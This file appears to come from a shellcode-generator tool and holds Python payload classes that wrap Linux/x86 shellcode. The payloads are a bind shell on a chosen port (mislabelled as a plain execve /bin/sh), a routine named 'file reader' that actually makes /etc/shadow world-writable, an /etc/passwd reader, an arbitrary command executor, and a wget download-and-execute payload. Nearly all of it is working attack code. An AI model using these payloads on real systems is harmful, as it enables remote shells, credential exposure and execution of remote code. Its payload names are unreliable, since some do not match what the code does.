class Payload(Shellcode): Shellcode.info["author"] = "xmgv" Shellcode.info["name"] = "Linux/x86 execve /bin/sh shellcode" Shellcode.info["references"] = [ "https://www.exploit-db.com/exploits/36398/", "https://xmgv.wordpress.com/2015/02/19/28/", ] Shellcode.info["size"] = 94 + Shellcode.getsize(kwargs["lport"]) Shellcode.info["rawassembly"] = [ "xor %eax,%eax", "push %eax", "push $0x68732f2f", "push $0x6e69622f", "mov %esp,%ebx", "push %eax", "push %ebx", "mov %esp,%ecx", "mov $0xb,%al", "int $0x80", ] def __init__(self, **kwargs): Shellcode.info["payload"] = [ r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53" r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0" r"\x66\x43\x52\x66\x68" + kwargs["lport"] + r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89" r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89" r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1" r"\xcd\x80\x93\x31\xc9\xb1\x02" r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92" r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80" ]
class Payload(Shellcode): Shellcode.info["author"] = "B3mB4m" Shellcode.info["name"] = "Linux/x86 - file reader" Shellcode.info["references"] = [ "https://www.exploit-db.com/exploits/37285/" ] Shellcode.info["size"] = 19 + Shellcode.getsize(kwargs["file"]) Shellcode.info["rawassembly"] = [ "xor %eax,%eax", "push %eax", "push $0x776f6461", "push $0x68732f63", "push $0x74652f2f", "mov $0xf,%al", "mov %esp,%ebx", "mov $0x1ff,%cx", "int $0x80", "xor %eax,%eax", "inc %eax", "int $0x80", ] def __init__(self, **kwargs): Shellcode.info["payload"] = [ r"\x31\xc0\x50" + kwargs["file"] + r"\xb0\x0f\x89\xe3\x66\xb9\xff" r"\x01\xcd\x80\x31\xc0\x40\xcd\x80" ]
class Payload(Shellcode): Shellcode.info["author"] = "B3mB4m" Shellcode.info["name"] = "Linux/x86 - file reader" Shellcode.info["references"] = [ "https://www.exploit-db.com/exploits/37297/" ] Shellcode.info["size"] = 43 + Shellcode.getsize(kwargs["file"]) Shellcode.info["rawassembly"] = [ "xor %ecx,%ecx", "xor %eax,%eax", "xor %edx,%edx", "push %ecx", "mov $0x5,%al", "push $0x64777373", "push $0x61702f63", "push $0x74652f2f", "mov %esp,%ebx", "int $0x80", "mov %ebx,%ecx", "mov %eax,%ebx", "mov $0x3,%al", "mov $0xfff,%dx", "inc %dx", "int $0x80", "xor %eax,%eax", "xor %ebx,%ebx", "mov $0x1,%bl", "mov $0x4,%al", "int $0x80", "xor %eax,%eax", "mov $0x1,%al", "int $0x80", ] def __init__(self, **kwargs): Shellcode.info["payload"] = [ r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" + kwargs["file"] + r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0" r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80" r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd" r"\x80\x31\xc0\xb0\x01\xcd\x80" ]
class Payload(Shellcode): Shellcode.info["author"] = "Unkown" Shellcode.info["name"] = "Linux/x86 - exec shellcode" Shellcode.info["size"] = 36 + Shellcode.getsize(kwargs["execommand"]) def __init__(self, **kwargs): db = [] for x in kwargs["execommand"]: db.append("\\x"+x.encode("hex")) kwargs["execommand"] = "".join(db) Shellcode.info["payload"] = [ r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f" r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12" r"\x00\x00\x00" +kwargs["execommand"]+ r"\x00\x57\x53\x89\xe1\xcd\x80" ]
class Payload(Shellcode): Shellcode.info["author"] = "B3mB4m" Shellcode.info["name"] = "Linux x86 Download & Execute Shellcode" Shellcode.info["references"] = [ "https://www.exploit-db.com/exploits/39389/" ] Shellcode.info["size"] = \ 101 + Shellcode.getsize(kwargs["filename"])*2 + Shellcode.getsize([kwargs["url"]]) Shellcode.info["rawassembly"] = [ "xor eax,eax", "mov al,0x2", "int 0x80", "xor ebx,ebx", "cmp eax,ebx", "jz 0x47", "xor ecx,ecx", "xor ebx,ebx", "xor eax,eax", "push byte +0x5", "mov ecx,esp", "mov ecx,esp", "mov ebx,esp", "mov al,0xa2", "int 0x80", "xor ecx,ecx", "xor eax,eax", "push eax", "mov al,0xf", "push byte +0x68", "mov ebx,esp", "xor ecx,ecx", "mov cx,0x1ff", "int 0x80", "xor eax,eax", "push eax", "push byte +0x68", "mov ebx,esp", "push eax", "mov edx,esp", "push ebx", "mov ecx,esp", "mov al,0xb", "int 0x80", "xor eax,eax", "inc eax", "int 0x80", "push byte +0xb", "pop eax", "cdq", "push edx", "push dword 0x682f6365", "push dword 0x78652f2f", "push dword 0x6f692e62", "push dword 0x75687469", "push dword 0x672e6d34", "push dword 0x626d3362", "mov ecx,esp", "push edx", "push byte +0x74", "push dword 0x6567772f", "push dword 0x6e69622f", "push dword 0x7273752f", "mov ebx,esp", "push edx", "push ecx", "push ebx", "mov ecx,esp", "int 0x80", ] def __init__(self, **kwargs): Shellcode.info["payload"] = [ r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74" r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1" r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31" r"\xc0\x50\xb0\x0f" +kwargs["filename"]+ r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31" r"\xc0\x50" +kwargs["filename"]+ r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd" r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52" +kwargs["url"]+ r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68" r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3" r"\x52\x51\x53\x89\xe1\xcd\x80" ]